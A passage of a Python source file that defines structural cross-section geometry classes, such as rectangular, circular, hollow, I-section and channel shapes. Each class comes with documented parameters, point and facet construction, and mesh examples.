Radius\n :param float theta: Initial angle\n :param int n: Number of points\n :param bool anti: Anticlockwise rotation?\n \"\"\"\n\n if r == 0:\n self.points.append(pt)\n return\n\n if anti:\n mult = 1\n else:\n mult = -1\n\n # calculate radius of points\n for i in range(n):\n # determine angle\n t = theta + mult * i * 1.0 / max(1, n - 1) * np.pi * 0.5\n\n x = pt[0] + r * np.cos(t)\n y = pt[1] + r * np.sin(t)\n self.points.append([x, y])\n\n def calculate_facet_length(self, facet):\n \"\"\"Calculates the length of the facet.\n\n :param facet: Point index pair *(p1, p2)* defining a facet\n :vartype facets: list[int, int]\n\n :return: Facet length\n :rtype: float\n \"\"\"\n\n # get facet points\n p1 = self.points[facet[0]]\n p2 = self.points[facet[1]]\n\n # calculate distance between two points\n return np.sqrt((p2[0] - p1[0]) ** 2 + (p2[1] - p1[1]) ** 2)\n\n def calculate_perimeter(self):\n \"\"\"Calculates the perimeter of the cross-section by summing the length of all facets in the\n ``perimeter`` class variable.\n\n :return: Cross-section perimeter, returns 0 if there is no perimeter defined\n :rtype: float\n \"\"\"\n\n # check to see if there are any facets in the perimeter variable\n if len(self.perimeter) == 0:\n return 0\n\n # initialise perimeter variable\n perimeter = 0\n\n # loop through all the facets along the perimeter\n for facet_idx in self.perimeter:\n perimeter += self.calculate_facet_length(self.facets[facet_idx])\n\n return perimeter\n\n\nclass CustomSection(Geometry):\n \"\"\"Constructs a cross-section from a list of points, facets, holes and a user specified control\n point.\n\n :param points: List of points *(x, y)* defining the vertices of the cross-section\n :type points: list[list[float, float]]\n :param facets: List of point index pairs *(p1, p2)* defining the edges of the cross-section\n :type facets: list[list[int, int]]\n :param holes: List of points *(x, y)* defining the locations of holes within the cross-section.\n If there are no holes, provide an empty list [].\n :type holes: list[list[float, float]]\n :param control_points: A list of points *(x, y)* that define different regions of the\n cross-section. A control point is an arbitrary point within a region enclosed by facets.\n :type control_points: list[list[float, float]]\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n :param perimeter: List of facet indices defining the perimeter of the cross-section\n :vartype perimeter: list[int]\n\n The following example creates a hollow trapezium with a base width of 100, top width of 50,\n height of 50 and a wall thickness of 10. A mesh is generated with a maximum triangular area of\n 2.0::\n\n import sectionproperties.pre.sections as sections\n\n points = [[0, 0], [100, 0], [75, 50], [25, 50], [15, 10], [85, 10], [70, 40], [30, 40]]\n facets = [[0, 1], [1, 2], [2, 3], [3, 0], [4, 5], [5, 6], [6, 7], [7, 4]]\n holes = [[50, 25]]\n control_points = [[5, 5]]\n perimeter = [0, 1, 2, 3]\n\n geometry = sections.CustomSection(\n points, facets, holes, control_points, perimeter=perimeter\n )\n mesh = geometry.create_mesh(mesh_sizes=[2.0])\n\n .. figure:: ../images/sections/custom_geometry.png\n :align: center\n :scale: 75 %\n\n Custom section geometry.\n\n .. figure:: ../images/sections/custom_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, points, facets, holes, control_points, shift=[0, 0], perimeter=[]):\n \"\"\"Inits the CustomSection class.\"\"\"\n\n super().__init__(control_points, shift)\n\n self.points = points\n self.facets = facets\n self.holes = holes\n self.perimeter = perimeter\n\n self.shift_section()\n\n\nclass RectangularSection(Geometry):\n \"\"\"Constructs a rectangular section with the bottom left corner at the origin *(0, 0)*, with\n depth *d* and width *b*.\n\n :param float d: Depth (y) of the rectangle\n :param float b: Width (x) of the rectangle\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a rectangular cross-section with a depth of 100 and width of 50,\n and generates a mesh with a maximum triangular area of 5::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.RectangularSection(d=100, b=50)\n mesh = geometry.create_mesh(mesh_sizes=[5])\n\n .. figure:: ../images/sections/rectangle_geometry.png\n :align: center\n :scale: 75 %\n\n Rectangular section geometry.\n\n .. figure:: ../images/sections/rectangle_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b, shift=[0, 0]):\n \"\"\"Inits the RectangularSection class.\"\"\"\n\n # assign control point\n control_points = [[0.5 * b, 0.5 * d]]\n\n super().__init__(control_points, shift)\n\n # construct the points and facets\n self.points = [[0, 0], [b, 0], [b, d], [0, d]]\n self.facets = [[0, 1], [1, 2], [2, 3], [3, 0]]\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass CircularSection(Geometry):\n \"\"\"Constructs a solid circle centered at the origin *(0, 0)* with diameter *d* and using *n*\n points to construct the circle.\n\n :param float d: Diameter of the circle\n :param int n: Number of points discretising the circle\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a circular cross-section with a diameter of 50 with 64 points,\n and generates a mesh with a maximum triangular area of 2.5::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.CircularSection(d=50, n=64)\n mesh = geometry.create_mesh(mesh_sizes=[2.5])\n\n .. figure:: ../images/sections/circle_geometry.png\n :align: center\n :scale: 75 %\n\n Circular section geometry.\n\n .. figure:: ../images/sections/circle_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, n, shift=[0, 0]):\n \"\"\"Inits the CircularSection class.\"\"\"\n\n # assign control point\n control_points = [[0, 0]]\n\n super().__init__(control_points, shift)\n\n # loop through each point on the circle\n for i in range(n):\n # determine polar angle\n theta = i * 2 * np.pi * 1.0 / n\n\n # calculate location of the point\n x = 0.5 * d * np.cos(theta)\n y = 0.5 * d * np.sin(theta)\n\n # append the current point to the points list\n self.points.append([x, y])\n\n # if we are not at the last point\n if i != n - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the circle\n else:\n self.facets.append([i, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass Chs(Geometry):\n \"\"\"Constructs a circular hollow section centered at the origin *(0, 0)*, with diameter *d* and\n thickness *t*, using *n* points to construct the inner and outer circles.\n\n :param float d: Outer diameter of the CHS\n :param float t: Thickness of the CHS\n :param int n: Number of points discretising the inner and outer circles\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a CHS discretised with 64 points, with a diameter of 48 and\n thickness of 3.2, and generates a mesh with a maximum triangular area of 1.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.Chs(d=48, t=3.2, n=64)\n mesh = geometry.create_mesh(mesh_sizes=[1.0])\n\n .. figure:: ../images/sections/chs_geometry.png\n :align: center\n :scale: 75 %\n\n CHS geometry.\n\n .. figure:: ../images/sections/chs_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, t, n, shift=[0, 0]):\n \"\"\"Inits the Chs class.\"\"\"\n\n # assign control point\n control_points = [[d * 0.5 - t * 0.5, 0]]\n\n super().__init__(control_points, shift)\n\n # specify a hole in the centre of the CHS\n self.holes = [[0, 0]]\n\n # loop through each point of the CHS\n for i in range(n):\n # determine polar angle\n theta = i * 2 * np.pi * 1.0 / n\n\n # calculate location of outer and inner points\n x_outer = 0.5 * d * np.cos(theta)\n y_outer = 0.5 * d * np.sin(theta)\n x_inner = (0.5 * d - t) * np.cos(theta)\n y_inner = (0.5 * d - t) * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x_outer, y_outer])\n self.points.append([x_inner, y_inner])\n\n # if we are not at the last point\n if i != n - 1:\n self.facets.append([i * 2, i * 2 + 2])\n self.facets.append([i * 2 + 1, i * 2 + 3])\n # if we are at the last point, complete the circle\n else:\n self.facets.append([i * 2, 0])\n self.facets.append([i * 2 + 1, 1])\n\n self.perimeter = list(range(0, len(self.facets), 2))\n\n self.shift_section()\n\n\nclass EllipticalSection(Geometry):\n \"\"\"Constructs a solid ellipse centered at the origin *(0, 0)* with vertical diameter *d_y* and\n horizontal diameter *d_x*, using *n* points to construct the ellipse.\n\n :param float d_y: Diameter of the ellipse in the y-dimension\n :param float d_x: Diameter of the ellipse in the x-dimension\n :param int n: Number of points discretising the ellipse\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates an elliptical cross-section with a vertical diameter of 25 and\n horizontal diameter of 50, with 40 points, and generates a mesh with a maximum triangular area\n of 1.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.EllipticalSection(d_y=25, d_x=50, n=40)\n mesh = geometry.create_mesh(mesh_sizes=[1.0])\n\n .. figure:: ../images/sections/ellipse_geometry.png\n :align: center\n :scale: 75 %\n\n Elliptical section geometry.\n\n .. figure:: ../images/sections/ellipse_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d_y, d_x, n, shift=[0, 0]):\n \"\"\"Inits the EllipticalSection class.\"\"\"\n\n # assign control point centered at zero\n control_points = [[0, 0]]\n\n super().__init__(control_points, shift)\n\n # loop through each point on the ellipse\n for i in range(n):\n # determine polar angle\n theta = i * 2 * np.pi * 1.0 / n\n\n # calculate location of the point\n x = 0.5 * d_x * np.cos(theta)\n y = 0.5 * d_y * np.sin(theta)\n\n # append the current point to the points list\n self.points.append([x, y])\n\n # if we are not at the last point\n if i != n - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the ellipse\n else:\n self.facets.append([i, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass Ehs(Geometry):\n \"\"\"Constructs an elliptical hollow section centered at the origin *(0, 0)*, with outer vertical\n diameter *d_y*, outer horizontal diameter *d_x*, and thickness *t*, using *n* points to\n construct the inner and outer ellipses.\n\n :param float d_y: Diameter of the ellipse in the y-dimension\n :param float d_x: Diameter of the ellipse in the x-dimension\n :param float t: Thickness of the EHS\n :param int n: Number of points discretising the inner and outer ellipses\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a EHS discretised with 30 points, with a outer vertical diameter\n of 25, outer horizontal diameter of 50, and thickness of 2.0, and generates a mesh with a\n maximum triangular area of 0.5::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.Ehs(d_y=25, d_x=50, t=2.0, n=64)\n mesh = geometry.create_mesh(mesh_sizes=[0.5])\n\n .. figure:: ../images/sections/ehs_geometry.png\n :align: center\n :scale: 75 %\n\n EHS geometry.\n\n .. figure:: ../images/sections/ehs_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d_y, d_x, t, n, shift=[0, 0]):\n \"\"\"Inits the Ehs class.\"\"\"\n\n # assign control point\n control_points = [[(d_x * 0.5) - (t * 0.5), 0]]\n\n super().__init__(control_points, shift)\n\n # specify a hole in the centre of the EHS\n self.holes = [[0, 0]]\n\n # loop through each point of the EHS\n for i in range(n):\n # determine polar angle\n theta = i * 2 * np.pi * 1.0 / n\n\n # calculate location of outer and inner points\n x_outer = 0.5 * d_x * np.cos(theta)\n y_outer = 0.5 * d_y * np.sin(theta)\n x_inner = ((0.5 * d_x) - t) * np.cos(theta)\n y_inner = ((0.5 * d_y) - t) * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x_outer, y_outer])\n self.points.append([x_inner, y_inner])\n\n # if we are not at the last point\n if i != n - 1:\n self.facets.append([i * 2, i * 2 + 2])\n self.facets.append([i * 2 + 1, i * 2 + 3])\n # if we are at the last point, complete the circle\n else:\n self.facets.append([i * 2, 0])\n self.facets.append([i * 2 + 1, 1])\n\n self.perimeter = list(range(0, len(self.facets), 2))\n\n self.shift_section()\n\n\nclass Rhs(Geometry):\n \"\"\"Constructs a rectangular hollow section centered at *(b/2, d/2)*, with depth *d*, width *b*,\n thickness *t* and outer radius *r_out*, using *n_r* points to construct the inner and outer\n radii. If the outer radius is less than the thickness of the RHS, the inner radius is set to\n zero.\n\n :param float d: Depth of the RHS\n :param float b: Width of the RHS\n :param float t: Thickness of the RHS\n :param float r_out: Outer radius of the RHS\n :param int n_r: Number of points discretising the inner and outer radii\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates an RHS with a depth of 100, a width of 50, a thickness of 6 and\n an outer radius of 9, using 8 points to discretise the inner and outer radii. A mesh is\n generated with a maximum triangular area of 2.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.Rhs(d=100, b=50, t=6, r_out=9, n_r=8)\n mesh = geometry.create_mesh(mesh_sizes=[2.0])\n\n .. figure:: ../images/sections/rhs_geometry.png\n :align: center\n :scale: 75 %\n\n RHS geometry.\n\n .. figure:: ../images/sections/rhs_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b, t, r_out, n_r, shift=[0, 0]):\n \"\"\"Inits the Rhs class.\"\"\"\n\n # assign control point\n control_points = [[b - t * 0.5, d * 0.5]]\n\n super().__init__(control_points, shift)\n\n # specify a hole in the centre of the RHS\n self.holes = [[b * 0.5, d * 0.5]]\n\n # calculate internal radius\n r_in = max(r_out - t, 0)\n\n # construct the outer radius points\n self.draw_radius([r_out, r_out], r_out, np.pi, n_r)\n self.draw_radius([b - r_out, r_out], r_out, 1.5 * np.pi, n_r)\n self.draw_radius([b - r_out, d - r_out], r_out, 0, n_r)\n self.draw_radius([r_out, d - r_out], r_out, 0.5 * np.pi, n_r)\n\n # construct the outer radius facet list\n n_outer = len(self.points)\n for i in range(n_outer):\n # if we are not at the last point\n if i != n_outer - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([i, 0])\n\n # construct the inner radius points\n self.draw_radius([t + r_in, t + r_in], r_in, np.pi, n_r)\n self.draw_radius([b - t - r_in, t + r_in], r_in, 1.5 * np.pi, n_r)\n self.draw_radius([b - t - r_in, d - t - r_in], r_in, 0, n_r)\n self.draw_radius([t + r_in, d - t - r_in], r_in, 0.5 * np.pi, n_r)\n\n # construct the inner radius facet list\n n_inner = len(self.points) - n_outer\n for i in range(n_inner):\n # if we are not at the last point\n if i != n_inner - 1:\n self.facets.append([i + n_outer, i + n_outer + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([i + n_outer, n_outer])\n\n self.perimeter = list(range(int(len(self.facets) / 2)))\n\n self.shift_section()\n\n\nclass ISection(Geometry):\n \"\"\"Constructs an I-section centered at *(b/2, d/2)*, with depth *d*, width *b*, flange\n thickness *t_f*, web thickness *t_w*, and root radius *r*, using *n_r* points to construct the\n root radius.\n\n :param float d: Depth of the I-section\n :param float b: Width of the I-section\n :param float t_f: Flange thickness of the I-section\n :param float t_w: Web thickness of the I-section\n :param float r: Root radius of the I-section\n :param int n_r: Number of points discretising the root radius\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates an I-section with a depth of 203, a width of 133, a flange\n thickness of 7.8, a web thickness of 5.8 and a root radius of 8.9, using 16 points to\n discretise the root radius. A mesh is generated with a maximum triangular area of 3.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.ISection(d=203, b=133, t_f=7.8, t_w=5.8, r=8.9, n_r=16)\n mesh = geometry.create_mesh(mesh_sizes=[3.0])\n\n .. figure:: ../images/sections/isection_geometry.png\n :align: center\n :scale: 75 %\n\n I-section geometry.\n\n .. figure:: ../images/sections/isection_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b, t_f, t_w, r, n_r, shift=[0, 0]):\n \"\"\"Inits the ISection class.\"\"\"\n\n # assign control point\n control_points = [[b * 0.5, d * 0.5]]\n\n super().__init__(control_points, shift)\n\n # add first three points\n self.points.append([0, 0])\n self.points.append([b, 0])\n self.points.append([b, t_f])\n\n # construct the bottom right radius\n pt = [b * 0.5 + t_w * 0.5 + r, t_f + r]\n self.draw_radius(pt, r, 1.5 * np.pi, n_r, False)\n\n # construct the top right radius\n pt = [b * 0.5 + t_w * 0.5 + r, d - t_f - r]\n self.draw_radius(pt, r, np.pi, n_r, False)\n\n # add the next four points\n self.points.append([b, d - t_f])\n self.points.append([b, d])\n self.points.append([0, d])\n self.points.append([0, d - t_f])\n\n # construct the top left radius\n pt = [b * 0.5 - t_w * 0.5 - r, d - t_f - r]\n self.draw_radius(pt, r, 0.5 * np.pi, n_r, False)\n\n # construct the bottom left radius\n pt = [b * 0.5 - t_w * 0.5 - r, t_f + r]\n self.draw_radius(pt, r, 0, n_r, False)\n\n # add the last point\n self.points.append([0, t_f])\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass MonoISection(Geometry):\n \"\"\"Constructs a monosymmetric I-section centered at *(max(b_t, b_b)/2, d/2)*, with depth *d*,\n top flange width *b_t*, bottom flange width *b_b*, top flange thickness *t_ft*, top flange\n thickness *t_fb*, web thickness *t_w*, and root radius *r*, using *n_r* points to construct the\n root radius.\n\n :param float d: Depth of the I-section\n :param float b_t: Top flange width\n :param float b_b: Bottom flange width\n :param float t_ft: Top flange thickness of the I-section\n :param float t_fb: Bottom flange thickness of the I-section\n :param float t_w: Web thickness of the I-section\n :param float r: Root radius of the I-section\n :param int n_r: Number of points discretising the root radius\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a monosymmetric I-section with a depth of 200, a top flange width\n of 50, a top flange thickness of 12, a bottom flange width of 130, a bottom flange thickness of\n 8, a web thickness of 6 and a root radius of 8, using 16 points to discretise the root radius.\n A mesh is generated with a maximum triangular area of 3.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.MonoISection(\n d=200, b_t=50, b_b=130, t_ft=12, t_fb=8, t_w=6, r=8, n_r=16\n )\n mesh = geometry.create_mesh(mesh_sizes=[3.0])\n\n .. figure:: ../images/sections/monoisection_geometry.png\n :align: center\n :scale: 75 %\n\n I-section geometry.\n\n .. figure:: ../images/sections/monoisection_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b_t, b_b, t_fb, t_ft, t_w, r, n_r, shift=[0, 0]):\n \"\"\"Inits the ISection class.\"\"\"\n\n # assign control point\n control_points = [[max(b_t, b_b) * 0.5, d * 0.5]]\n\n super().__init__(control_points, shift)\n\n # calculate central axis\n x_central = max(b_t, b_b) * 0.5\n\n # add first three points\n self.points.append([x_central - b_b * 0.5, 0])\n self.points.append([x_central + b_b * 0.5, 0])\n self.points.append([x_central + b_b * 0.5, t_fb])\n\n # construct the bottom right radius\n pt = [x_central + t_w * 0.5 + r, t_fb + r]\n self.draw_radius(pt, r, 1.5 * np.pi, n_r, False)\n\n # construct the top right radius\n pt = [x_central + t_w * 0.5 + r, d - t_ft - r]\n self.draw_radius(pt, r, np.pi, n_r, False)\n\n # add the next four points\n self.points.append([x_central + b_t * 0.5, d - t_ft])\n self.points.append([x_central + b_t * 0.5, d])\n self.points.append([x_central - b_t * 0.5, d])\n self.points.append([x_central - b_t * 0.5, d - t_ft])\n\n # construct the top left radius\n pt = [x_central - t_w * 0.5 - r, d - t_ft - r]\n self.draw_radius(pt, r, 0.5 * np.pi, n_r, False)\n\n # construct the bottom left radius\n pt = [x_central - t_w * 0.5 - r, t_fb + r]\n self.draw_radius(pt, r, 0, n_r, False)\n\n # add the last point\n self.points.append([x_central - b_b * 0.5, t_fb])\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass TaperedFlangeISection(Geometry):\n \"\"\"Constructs a Tapered Flange I-section centered at *(b/2, d/2)*, with depth *d*, width *b*,\n mid-flange thickness *t_f*, web thickness *t_w*, root radius *r_r*, flange radius *r_f* and\n flange angle *alpha*, using *n_r* points to construct the radii.\n\n :param float d: Depth of the Tapered Flange I-section\n :param float b: Width of the Tapered Flange I-section\n :param float t_f: Mid-flange thickness of the Tapered Flange I-section (measured at the point\n equidistant from the face of the web to the edge of the flange)\n :param float t_w: Web thickness of the Tapered Flange I-section\n :param float r_r: Root radius of the Tapered Flange I-section\n :param float r_f: Flange radius of the Tapered Flange I-section\n :param float alpha: Flange angle of the Tapered Flange I-section (degrees)\n :param int n_r: Number of points discretising the radii\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a Tapered Flange I-section with a depth of 588, a width of 191, a\n mid-flange thickness of 27.2, a web thickness of 15.2, a root radius of 17.8, a flange radius\n of 8.9 and a flange angle of 8°, using 16 points to discretise the radii. A mesh is generated\n with a maximum triangular area of 20.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.TaperedFlangeISection(\n d=588, b=191, t_f=27.2, t_w=15.2, r_r=17.8, r_f=8.9, alpha=8, n_r=16\n )\n mesh = geometry.create_mesh(mesh_sizes=[20.0])\n\n .. figure:: ../images/sections/taperedisection_geometry.png\n :align: center\n :scale: 75 %\n\n I-section geometry.\n\n .. figure:: ../images/sections/taperedisection_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b, t_f, t_w, r_r, r_f, alpha, n_r, shift=[0, 0]):\n \"\"\"Inits the ISection class.\"\"\"\n\n # assign control point\n control_points = [[b * 0.5, d * 0.5]]\n\n super().__init__(control_points, shift)\n\n # calculate alpha in radians\n alpha_rad = np.pi * alpha / 180\n\n # calculate the height of the flange toe and dimensions of the straight\n x1 = b * 0.25 - t_w * 0.25 - r_f * (1 - np.sin(alpha_rad))\n y1 = x1 * np.tan(alpha_rad)\n x2 = b * 0.25 - t_w * 0.25 - r_r * (1 - np.sin(alpha_rad))\n y2 = x2 * np.tan(alpha_rad)\n y_t = t_f - y1 - r_f * np.cos(alpha_rad)\n\n # add first two points\n self.points.append([0, 0])\n self.points.append([b, 0])\n\n # construct the bottom right flange toe radius\n if r_f == 0:\n self.points.append([b, y_t])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = i * 1.0 / max(1, n_r - 1) * (np.pi * 0.5 - alpha_rad)\n\n # calculate the locations of the radius points\n x = b - r_f + r_f * np.cos(theta)\n y = y_t + r_f * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the bottom right root radius\n if r_r == 0:\n self.points.append([b * 0.5 + t_w * 0.5, t_f + y2])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = (\n 3.0 / 2 * np.pi - alpha_rad) - (i * 1.0 / max(1, n_r - 1) * (\n np.pi * 0.5 - alpha_rad)\n )\n\n # calculate the locations of the radius points\n x = b * 0.5 + t_w * 0.5 + r_r + r_r * np.cos(theta)\n y = t_f + y2 + r_r * np.cos(alpha_rad) + r_r * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the top right root radius\n if r_r == 0:\n self.points.append([b * 0.5 + t_w * 0.5, d - t_f - y2])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = np.pi - i * 1.0 / max(1, n_r - 1) * (np.pi * 0.5 - alpha_rad)\n\n # calculate the locations of the radius points\n x = b * 0.5 + t_w * 0.5 + r_r + r_r * np.cos(theta)\n y = d - t_f - y2 - r_r * np.cos(alpha_rad) + r_r * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the top right flange toe radius\n if r_f == 0:\n self.points.append([b, d - y_t])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = (\n 3.0 * np.pi / 2 + alpha_rad) + i * 1.0 / max(1, n_r - 1) * (\n np.pi * 0.5 - alpha_rad\n )\n\n # calculate the locations of the radius points\n x = b - r_f + r_f * np.cos(theta)\n y = d - y_t + r_f * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # add the next two points\n self.points.append([b, d])\n self.points.append([0, d])\n\n # construct the top left flange toe radius\n if r_f == 0:\n self.points.append([0, d - y_t])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = np.pi + (i * 1.0 / max(1, n_r - 1) * (np.pi * 0.5 - alpha_rad))\n\n # calculate the locations of the radius points\n x = r_f + r_f * np.cos(theta)\n y = d - y_t + r_f * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the top left root radius\n if r_r == 0:\n self.points.append([b * 0.5 - t_w * 0.5, d - t_f - y2])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = (\n np.pi * 0.5 - alpha_rad) - (i * 1.0 / max(1, n_r - 1) * (\n np.pi * 0.5 - alpha_rad)\n )\n\n # calculate the locations of the radius points\n x = b * 0.5 - t_w * 0.5 - r_r + r_r * np.cos(theta)\n y = d - t_f - y2 - r_r * np.cos(alpha_rad) + r_r * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the bottom left root radius\n if r_r == 0:\n self.points.append([b * 0.5 - t_w * 0.5, t_f + y2])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = -i * 1.0 / max(1, n_r - 1) * (np.pi * 0.5 - alpha_rad)\n\n # calculate the locations of the radius points\n x = b * 0.5 - t_w * 0.5 - r_r + r_r * np.cos(theta)\n y = t_f + y2 + r_r * np.cos(alpha_rad) + r_r * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # construct the bottom left flange toe radius\n if r_f == 0:\n self.points.append([0, y_t])\n else:\n for i in range(n_r):\n # determine polar angle\n theta = (\n np.pi * 0.5 + alpha_rad) + (i * 1.0 / max(1, n_r - 1) * (\n np.pi * 0.5 - alpha_rad)\n )\n\n # calculate the locations of the radius points\n x = r_f + r_f * np.cos(theta)\n y = y_t + r_f * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x, y])\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass PfcSection(Geometry):\n \"\"\"Constructs a PFC section with the bottom left corner at the origin *(0, 0)*, with depth *d*,\n width *b*, flange thickness *t_f*, web thickness *t_w* and root radius *r*, using *n_r* points\n to construct the root radius.\n\n :param float d: Depth of the PFC section\n :param float b: Width of the PFC section\n :param float t_f: Flange thickness of the PFC section\n :param float t_w: Web thickness of the PFC section\n :param float r: Root radius of the PFC section\n :param int n_r: Number of points discretising the root radius\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a PFC section with a depth of 250, a width of 90, a flange\n thickness of 15, a web thickness of 8 and a root radius of 12, using 8 points to discretise the\n root radius. A mesh is generated with a maximum triangular area of 5.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.PfcSection(d=250, b=90, t_f=15, t_w=8, r=12, n_r=8)\n mesh = geometry.create_mesh(mesh_sizes=[5.0])\n\n .. figure:: ../images/sections/pfc_geometry.png\n :align: center\n :scale: 75 %\n\n PFC geometry.\n\n .. figure:: ../images/sections/pfc_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b, t_f, t_w, r, n_r, shift=[0, 0]):\n \"\"\"Inits the PfcSection class.\"\"\"\n\n # assign control point\n control_points = [[t_w * 0.5, d * 0.5]]\n\n super().__init__(control_points, shift)\n\n # add first three points\n self.points.append([0, 0])\n self.points.append([b, 0])\n self.points.append([b, t_f])\n\n # construct the bottom right radius\n pt = [t_w + r, t_f + r]\n self.draw_radius(pt, r, 1.5 * np.pi, n_r, False)\n\n # construct the top right radius\n pt = [t_w + r, d - t_f - r]\n self.draw_radius(pt, r, np.pi, n_r, False)\n\n # add last three points\n self.points.append([b, d - t_f])\n self.points.append([b, d])\n self.points.append([0, d])\n\n # build the facet list\n for i in range(len(self.points)):\n # if we are not at the last point\n if i != len(self.points) - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the loop\n else:\n self.facets.append([len(self.points) - 1, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass TaperedFlangeChannel(Geometry):\n \"\"\"Constructs a Tapered Flange Channel section with the bottom left corner at the origin\n *(0, 0)*, with depth *d*, width *b*, mid-flange thickness *t_f*, web thickness *t_w*, root\n radius *r_r*, flange radius *r_f* and flange angle *alpha*, using *n_r* points to construct the\n radii.\n\n :param float d: Depth of the Tapered Flange Channel section\n :param float b: Width of the Tapered Flange Channel section\n :param float t_f: Mid-flange thickness of the Tapered Flange Channel section (measured at the\n point equidistant from the face of the web to the edge of the flange)\n :param float t_w: Web thickness of the Tapered Flange Channel section\n :param float r_r: Root radius of the Tapered Flange Channel section\n :param float r_f: Flange radius of the Tapered Flange Channel section\n :param float alpha: Flange angle of the Tapered Flange Channel section (degrees)\n :param int n_r: Number of points discretising the radii\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a Tapered Flange Channel section with a depth of 10, a width of\n 3.5, a mid-flange thickness of 0.575, a web thickness of 0.475, a root radius of 0.575, a\n flange radius of 0.4 and a flange angle of 8°, using 16 points to discretise the radii. A mesh\n is generated with a maximum triangular area of 0.02::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.TaperedFlangeChannel(\n d=10, b=3.5, t_f=0.575, t_w=0.475, r_r=0.575, r_f=0.4, alpha=8, n_r=16\n )\n mesh = 